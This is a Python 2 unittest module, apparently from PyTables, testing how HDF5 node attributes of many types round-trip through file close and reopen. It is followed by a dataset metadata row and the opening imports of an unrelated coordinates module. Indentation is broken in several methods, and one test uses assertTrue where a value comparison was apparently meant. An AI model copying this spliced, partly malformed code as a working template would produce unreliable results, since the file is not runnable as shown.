        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    # 0-dim arrays compare equal to the scalar values they wrap.
    self.assertEqual(self.root.anarray.attrs.pq, True)
    self.assertEqual(self.root.anarray.attrs.qr, False)
    self.assertEqual(self.root.anarray.attrs.rs, True)
def test00d_setBoolAttributes(self):
    """Checking setting Bool attributes (NumPy, multidim case).

    Covers 1-d, nested 1-element and genuinely 2-d boolean arrays.
    """
    self.array.attrs.pq = numpy.array([True])
    self.array.attrs.qr = numpy.array([[False]])
    self.array.attrs.rs = numpy.array([[True, False],[True, False]])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.root.anarray.attrs.pq, numpy.array([True]))
    assert_array_equal(self.root.anarray.attrs.qr, numpy.array([[False]]))
    assert_array_equal(self.root.anarray.attrs.rs,
                       numpy.array([[True, False],[True, False]]))
def test01a_setIntAttributes(self):
    """Checking setting Int attributes (scalar, Python case).

    Python ints must come back as ``numpy.int_`` scalars.
    """
    self.array.attrs.pq = 1
    self.array.attrs.qr = 2
    self.array.attrs.rs = 3
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.int_))
    self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.int_))
    self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.int_))
    self.assertEqual(self.root.anarray.attrs.pq, 1)
    self.assertEqual(self.root.anarray.attrs.qr, 2)
    self.assertEqual(self.root.anarray.attrs.rs, 3)
def test01b_setIntAttributes(self):
    """Checking setting Int attributes (scalar, NumPy case).

    One attribute per integer dtype; each must round-trip with its
    dtype preserved.
    """
    # 'UInt64' not supported on Win
    checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
                  'UInt8', 'UInt16', 'UInt32']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype, numpy.array(1, dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array(1, dtype=dtype))
def test01c_setIntAttributes(self):
    """Checking setting Int attributes (unidimensional NumPy case)."""
    # 'UInt64' not supported on Win
    checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
                  'UInt8', 'UInt16', 'UInt32']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype, numpy.array([1,2], dtype=dtype))
    # Check the results
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        if common.verbose:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([1,2], dtype=dtype))
def test01d_setIntAttributes(self):
    """Checking setting Int attributes (unidimensional, non-contiguous).

    Stores strided (non-contiguous) slices to make sure they are
    persisted as their logical contents.
    """
    # 'UInt64' not supported on Win
    checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
                  'UInt8', 'UInt16', 'UInt32']
    for dtype in checktypes:
        # [::2] yields a non-contiguous view: [1, 3]
        arr = numpy.array([1,2,3,4], dtype=dtype)[::2]
        setattr(self.array.attrs, dtype, arr)
    # Check the results
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        arr = numpy.array([1,2,3,4], dtype=dtype)[::2]
        if common.verbose:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
        assert_array_equal(getattr(self.array.attrs, dtype), arr)
def test01e_setIntAttributes(self):
    """Checking setting Int attributes (bidimensional NumPy case)."""
    # 'UInt64' not supported on Win
    checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
                  'UInt8', 'UInt16', 'UInt32']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array([[1,2],[2,3]], dtype=dtype))
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    # Check the results
    for dtype in checktypes:
        if common.verbose:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([[1,2],[2,3]], dtype=dtype))
def test02a_setFloatAttributes(self):
"""Checking setting Float (double) attributes"""
# Set some attrs
self.array.attrs.pq = 1.0
self.array.attrs.qr = 2.0
self.array.attrs.rs = 3.0
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.float_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.float_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.float_))
self.assertTrue(self.root.anarray.attrs.pq, 1.0)
self.assertTrue(self.root.anarray.attrs.qr, 2.0)
self.assertTrue(self.root.anarray.attrs.rs, 3.0)
def test02b_setFloatAttributes(self):
    """Checking setting Float attributes (scalar, NumPy case)."""
    checktypes = ['Float32', 'Float64']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array(1.1, dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        #assert getattr(self.array.attrs, dtype) == 1.1
        # In order to make Float32 tests pass. This is legal, not a trick.
        assert_almost_equal(getattr(self.array.attrs, dtype), 1.1)
def test02c_setFloatAttributes(self):
    """Checking setting Float attributes (unidimensional NumPy case)."""
    checktypes = ['Float32', 'Float64']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array([1.1,2.1], dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([1.1,2.1], dtype=dtype))
def test02d_setFloatAttributes(self):
    """Checking setting Float attributes (unidimensional, non-contiguous)."""
    checktypes = ['Float32', 'Float64']
    for dtype in checktypes:
        # [1::2] yields a non-contiguous view: [2.1, 4.1]
        arr = numpy.array([1.1,2.1,3.1,4.1], dtype=dtype)[1::2]
        setattr(self.array.attrs, dtype, arr)
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        arr = numpy.array([1.1,2.1,3.1,4.1], dtype=dtype)[1::2]
        assert_array_equal(getattr(self.array.attrs, dtype), arr)
def test02e_setFloatAttributes(self):
    """Checking setting Float attributes (bidimensional NumPy case).

    (Docstring fixed: it previously said "Int" but the test exercises
    Float32/Float64.)
    """
    checktypes = ['Float32', 'Float64']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
def test03_setObjectAttributes(self):
"""Checking setting Object attributes"""
# Set some attrs
self.array.attrs.pq = [1.0, 2]
self.array.attrs.qr = (1,2)
self.array.attrs.rs = {"ddf":32.1, "dsd":1}
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertEqual(self.root.anarray.attrs.pq, [1.0, 2])
self.assertEqual(self.root.anarray.attrs.qr, (1,2))
self.assertEqual(self.root.anarray.attrs.rs, {"ddf":32.1, "dsd":1})
def test04a_setStringAttributes(self):
"""Checking setting string attributes (scalar case)"""
self.array.attrs.pq = 'foo'
self.array.attrs.qr = 'bar'
self.array.attrs.rs = 'baz'
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.string_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.string_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.string_))
self.assertEqual(self.root.anarray.attrs.pq, 'foo')
self.assertEqual(self.root.anarray.attrs.qr, 'bar')
self.assertEqual(self.root.anarray.attrs.rs, 'baz')
def test04b_setStringAttributes(self):
    """Checking setting string attributes (unidimensional 1-elem case)."""
    self.array.attrs.pq = numpy.array(['foo'])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.root.anarray.attrs.pq,
                       numpy.array(['foo']))
def test04c_setStringAttributes(self):
    """Checking setting string attributes (empty unidimensional
    1-elem case)."""
    self.array.attrs.pq = numpy.array([''])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    assert_array_equal(self.root.anarray.attrs.pq,
                       numpy.array(['']))
def test04d_setStringAttributes(self):
"""Checking setting string attributes (unidimensional 2-elem case)"""
self.array.attrs.pq = numpy.array(['foo', 'bar3'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array(['foo', 'bar3']))
def test04e_setStringAttributes(self):
    """Checking setting string attributes (empty unidimensional
    2-elem case)."""
    self.array.attrs.pq = numpy.array(['', ''])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.root.anarray.attrs.pq,
                       numpy.array(['', '']))
def test04f_setStringAttributes(self):
    """Checking setting string attributes (bidimensional 4-elem case)."""
    self.array.attrs.pq = numpy.array([['foo', 'foo2'],
                                       ['foo3', 'foo4']])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.root.anarray.attrs.pq,
                       numpy.array([['foo', 'foo2'],
                                    ['foo3', 'foo4']]))
def test05a_setComplexAttributes(self):
"""Checking setting Complex (python) attributes"""
# Set some attrs
self.array.attrs.pq = 1.0+2j
self.array.attrs.qr = 2.0+3j
self.array.attrs.rs = 3.0+4j
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.complex_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.complex_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.complex_))
self.assertEqual(self.root.anarray.attrs.pq, 1.0+2j)
self.assertEqual(self.root.anarray.attrs.qr, 2.0+3j)
self.assertEqual(self.root.anarray.attrs.rs, 3.0+4j)
def test05b_setComplexAttributes(self):
    """Checking setting Complex attributes (scalar, NumPy case)."""
    checktypes = ['complex64', 'complex128']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array(1.1+2j, dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        #assert getattr(self.array.attrs, dtype) == 1.1+2j
        # In order to make Complex32 tests pass.
        assert_almost_equal(getattr(self.array.attrs, dtype), 1.1+2j)
def test05c_setComplexAttributes(self):
    """Checking setting Complex attributes (unidimensional NumPy case)."""
    checktypes = ['Complex32', 'Complex64']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array([1.1,2.1], dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([1.1,2.1], dtype=dtype))
def test05d_setComplexAttributes(self):
    """Checking setting Complex attributes (bidimensional NumPy case).

    (Docstring fixed: it previously said "Int" but the test exercises
    Complex32/Complex64.)
    """
    checktypes = ['Complex32', 'Complex64']
    for dtype in checktypes:
        setattr(self.array.attrs, dtype,
                numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
    # Check the results
    if common.verbose:
        for dtype in checktypes:
            print "type, value-->", dtype, getattr(self.array.attrs, dtype)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    for dtype in checktypes:
        assert_array_equal(getattr(self.array.attrs, dtype),
                           numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
def test06a_setUnicodeAttributes(self):
    """Checking setting unicode attributes (scalar case).

    Includes the empty unicode string (regression check for #213).
    """
    self.array.attrs.pq = u'para\u0140lel'
    self.array.attrs.qr = u''  # check #213
    self.array.attrs.rs = u'baz'
    # Check the results
    if common.verbose:
        if sys.platform != 'win32':
            # It seems that Windows cannot print this
            print "pq -->", self.array.attrs.pq
        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    self.assertTrue(isinstance(self.array.attrs.pq, numpy.unicode_))
    self.assertTrue(isinstance(self.array.attrs.qr, numpy.unicode_))
    self.assertTrue(isinstance(self.array.attrs.rs, numpy.unicode_))
    self.assertEqual(self.array.attrs.pq, u'para\u0140lel')
    self.assertEqual(self.array.attrs.qr, u'')
    self.assertEqual(self.array.attrs.rs, u'baz')
def test06b_setUnicodeAttributes(self):
"""Checking setting unicode attributes (unidimensional 1-elem case)"""
self.array.attrs.pq = numpy.array([u'para\u0140lel'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.array.attrs.pq,
numpy.array([u'para\u0140lel']))
def test06c_setUnicodeAttributes(self):
    """Checking setting unicode attributes (empty unidimensional
    1-elem case)."""
    # The next raises a `TypeError` when unpickled. See:
    # http://projects.scipy.org/numpy/ticket/1037
    #self.array.attrs.pq = numpy.array([u''])
    self.array.attrs.pq = numpy.array([u''], dtype="U1")
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    if common.verbose:
        print "pq -->", `self.array.attrs.pq`
    assert_array_equal(self.array.attrs.pq,
                       numpy.array([u''], dtype="U1"))
def test06d_setUnicodeAttributes(self):
    """Checking setting unicode attributes (unidimensional 2-elem case)."""
    self.array.attrs.pq = numpy.array([u'para\u0140lel', u'bar3'])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.array.attrs.pq,
                       numpy.array([u'para\u0140lel', u'bar3']))
def test06e_setUnicodeAttributes(self):
    """Checking setting unicode attributes (empty unidimensional
    2-elem case)."""
    self.array.attrs.pq = numpy.array(['', ''], dtype="U1")
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.array.attrs.pq,
                       numpy.array(['', ''], dtype="U1"))
def test06f_setUnicodeAttributes(self):
    """Checking setting unicode attributes (bidimensional 4-elem case)."""
    self.array.attrs.pq = numpy.array([[u'para\u0140lel', 'foo2'],
                                       ['foo3', u'para\u0140lel4']])
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    assert_array_equal(self.array.attrs.pq,
                       numpy.array([[u'para\u0140lel', 'foo2'],
                                    ['foo3', u'para\u0140lel4']]))
def test07a_setRecArrayAttributes(self):
    """Checking setting RecArray (NumPy) attributes.

    Structured arrays (flat compound dtype) in 1-d and 2-d shapes must
    round-trip as ``numpy.ndarray`` with their contents intact.
    """
    dt = numpy.dtype('i4,f8')
    # Set some attrs
    self.array.attrs.pq = numpy.zeros(2, dt)
    self.array.attrs.qr = numpy.ones((2,2), dt)
    self.array.attrs.rs = numpy.array([(1,2.)], dt)
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
    self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
    self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
    assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
    assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
    assert_array_equal(self.array.attrs.rs, numpy.array([(1,2.)], dt))
    def test07b_setRecArrayAttributes(self):
        """Checking setting nested RecArray (NumPy) attributes"""
        # Build a nested dtype
        dt = numpy.dtype([('f1', [('f1', 'i2'), ('f2', 'f8')])])
        # Set some attrs
        self.array.attrs.pq = numpy.zeros(2, dt)
        self.array.attrs.qr = numpy.ones((2,2), dt)
        self.array.attrs.rs = numpy.array([((1,2.),)], dt)
        # Check the results
        if common.verbose:
            print "pq -->", self.array.attrs.pq
            print "qr -->", self.array.attrs.qr
            print "rs -->", self.array.attrs.rs
        if self.close:
            if common.verbose:
                print "(closing file version)"
            # Reopen so the attributes are read back from disk.
            self.fileh.close()
            self.fileh = openFile(self.file, mode = "r+")
            self.root = self.fileh.root
            self.array = self.fileh.root.anarray
        self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
        self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
        self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
        assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
        assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
        # (1,2) compares equal to the stored (1,2.) after dtype coercion.
        assert_array_equal(self.array.attrs.rs, numpy.array([((1,2),)], dt))
    def test07c_setRecArrayAttributes(self):
        """Checking setting multidim nested RecArray (NumPy) attributes"""
        # Build a nested dtype
        # The inner 'f1' field is itself multidimensional (shape (2,)).
        dt = numpy.dtype([('f1', [('f1', 'i2', (2,)), ('f2', 'f8')])])
        # Set some attrs
        self.array.attrs.pq = numpy.zeros(2, dt)
        self.array.attrs.qr = numpy.ones((2,2), dt)
        self.array.attrs.rs = numpy.array([(([1,3],2.),)], dt)
        # Check the results
        if common.verbose:
            print "pq -->", self.array.attrs.pq
            print "qr -->", self.array.attrs.qr
            print "rs -->", self.array.attrs.rs
        if self.close:
            if common.verbose:
                print "(closing file version)"
            # Reopen so the attributes are read back from disk.
            self.fileh.close()
            self.fileh = openFile(self.file, mode = "r+")
            self.root = self.fileh.root
            self.array = self.fileh.root.anarray
        self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
        self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
        self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
        assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
        assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
        assert_array_equal(self.array.attrs.rs, numpy.array([(([1,3],2),)], dt))
class NotCloseTypesTestCase(TypesTestCase):
    # Run the type tests without closing/reopening the file between set and check.
    close = 0
class CloseTypesTestCase(TypesTestCase):
    # Run the type tests with a close/reopen cycle so attributes round-trip to disk.
    close = 1
class NoSysAttrsTestCase(unittest.TestCase):
    # Exercises attribute listing when the file is created with
    # PYTABLES_SYS_ATTRS=False, i.e. no system attributes are written.

    def setUp(self):
        # Create an instance of HDF5 Table
        self.file = tempfile.mktemp(".h5")
        self.fileh = openFile(
            self.file, mode = "w", PYTABLES_SYS_ATTRS=False)
        self.root = self.fileh.root
        # Create a table object
        self.table = self.fileh.createTable(self.root, 'atable',
                                            Record, "Table title")
        # Create an array object
        self.array = self.fileh.createArray(self.root, 'anarray',
                                            [1], "Array title")
        # Create a group object
        self.group = self.fileh.createGroup(self.root, 'agroup',
                                            "Group title")

    def tearDown(self):
        self.fileh.close()
        os.remove(self.file)
        common.cleanup(self)

    def test00_listAttributes(self):
        """Checking listing attributes (no system attrs version)."""
        # With a Group object
        self.group._v_attrs.pq = "1"
        self.group._v_attrs.qr = "2"
        self.group._v_attrs.rs = "3"
        if common.verbose:
            print "Attribute list:", self.group._v_attrs._f_list()
        # Now, try with a Table object
        self.table.attrs.a = "1"
        self.table.attrs.c = "2"
        self.table.attrs.b = "3"
        if common.verbose:
            print "Attribute list:", self.table.attrs._f_list()
        # Finally, try with an Array object
        self.array.attrs.k = "1"
        self.array.attrs.j = "2"
        self.array.attrs.i = "3"
        if common.verbose:
            print "Attribute list:", self.array.attrs._f_list()
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+")
            self.root = self.fileh.root
        # User attributes must be reported sorted; no system attrs must appear.
        agroup = self.root.agroup
        self.assertEqual(agroup._v_attrs._f_list("user"), ["pq", "qr", "rs"])
        self.assertEqual(agroup._v_attrs._f_list("sys"), [])
        self.assertEqual(agroup._v_attrs._f_list("all"), ["pq", "qr", "rs"])
        atable = self.root.atable
        self.assertEqual(atable.attrs._f_list(), ["a", "b", "c"])
        self.assertEqual(atable.attrs._f_list("sys"), [])
        self.assertEqual(atable.attrs._f_list("all"), ["a", "b", "c"])
        anarray = self.root.anarray
        self.assertEqual(anarray.attrs._f_list(), ["i", "j", "k"])
        self.assertEqual(anarray.attrs._f_list("sys"), [])
        self.assertEqual(anarray.attrs._f_list("all"), ["i", "j", "k"])
class NoSysAttrsNotClose(NoSysAttrsTestCase):
    # No close/reopen cycle before checking the attribute lists.
    close = False
class NoSysAttrsClose(NoSysAttrsTestCase):
    # Close and reopen the file before checking the attribute lists.
    close = True
class SegFaultPythonTestCase(common.TempFileMixin, common.PyTablesTestCase):
    # Regression test: string attributes that look like numbers ("0", "0.")
    # used to crash via Python's unpickling machinery (issue #253).

    def test00_segfault(self):
        """Checking workaround for Python unpickle problem (see #253)."""
        self.h5file.root._v_attrs.trouble1 = "0"
        self.assertEqual(self.h5file.root._v_attrs.trouble1, "0")
        self.h5file.root._v_attrs.trouble2 = "0."
        self.assertEqual(self.h5file.root._v_attrs.trouble2, "0.")
        # Problem happens after reopening
        self._reopen()
        self.assertEqual(self.h5file.root._v_attrs.trouble1, "0")
        self.assertEqual(self.h5file.root._v_attrs.trouble2, "0.")
        if common.verbose:
            print "Great! '0' and '0.' values can be safely retrieved."
class UnsupportedAttrTypeTestCase(PyTablesTestCase):
    # Opening a file holding an attribute of an unsupported HDF5 type must
    # emit a DataTypeWarning instead of failing outright.

    def test00_unsupportedType(self):
        """Checking file with unsupported type."""
        filename = self._testFilename('attr-u16.h5')
        fileh = openFile(filename)
        # repr() walks all attributes, which triggers the warning.
        self.failUnlessWarns(DataTypeWarning, repr, fileh)
        fileh.close()
# Test for specific system attributes in EArray
class SpecificAttrsTestCase(common.TempFileMixin, common.PyTablesTestCase):
    # Checks the EXTDIM system attribute of EArrays, which records the index
    # of the enlargeable (size-0) dimension.

    def test00_earray(self):
        "Testing EArray specific attrs (create)."
        # The enlargeable dimension is the one with size 0, here dimension 1.
        ea = self.h5file.createEArray('/', 'ea', Int32Atom(), (2,0,4))
        if common.verbose:
            print "EXTDIM-->", ea.attrs.EXTDIM
        self.assertEqual(ea.attrs.EXTDIM, 1)

    def test01_earray(self):
        "Testing EArray specific attrs (open)."
        # EXTDIM must survive closing and reopening the file read-only.
        ea = self.h5file.createEArray('/', 'ea', Int32Atom(), (0,1,4))
        self._reopen('r')
        ea = self.h5file.root.ea
        if common.verbose:
            print "EXTDIM-->", ea.attrs.EXTDIM
        self.assertEqual(ea.attrs.EXTDIM, 0)
#----------------------------------------------------------------------
def suite():
    """Build and return the test suite aggregating all attribute test cases."""
    theSuite = unittest.TestSuite()
    niter = 1
    # All test-case classes, in the same order the suite should run them.
    test_cases = (
        NotCloseCreate,
        CloseCreate,
        NoCacheNotCloseCreate,
        NoCacheCloseCreate,
        DictCacheNotCloseCreate,
        DictCacheCloseCreate,
        NotCloseTypesTestCase,
        CloseTypesTestCase,
        NoSysAttrsNotClose,
        NoSysAttrsClose,
        SegFaultPythonTestCase,
        UnsupportedAttrTypeTestCase,
        SpecificAttrsTestCase,
    )
    for _ in range(niter):
        for case in test_cases:
            theSuite.addTest(unittest.makeSuite(case))
    return theSuite
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main( defaultTest='suite' )
| 37.130273 | 84 | 0.571791 |
cbe3c90697a8da3be7194240451dcd5c6f1ceea3 | 40,450 | py | Python | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | 3 | 2019-09-03T21:08:01.000Z | 2021-05-22T18:41:12.000Z | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | null | null | null | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | 2 | 2020-02-28T15:59:56.000Z | 2021-02-11T21:07:37.000Z | """
classes to work with coordinates in native, freesurfer and MNI space
"""
import nibabel as nib
import numpy as np
import os
import nipype.pipeline.engine as pe
from nipype import Node, Workflow
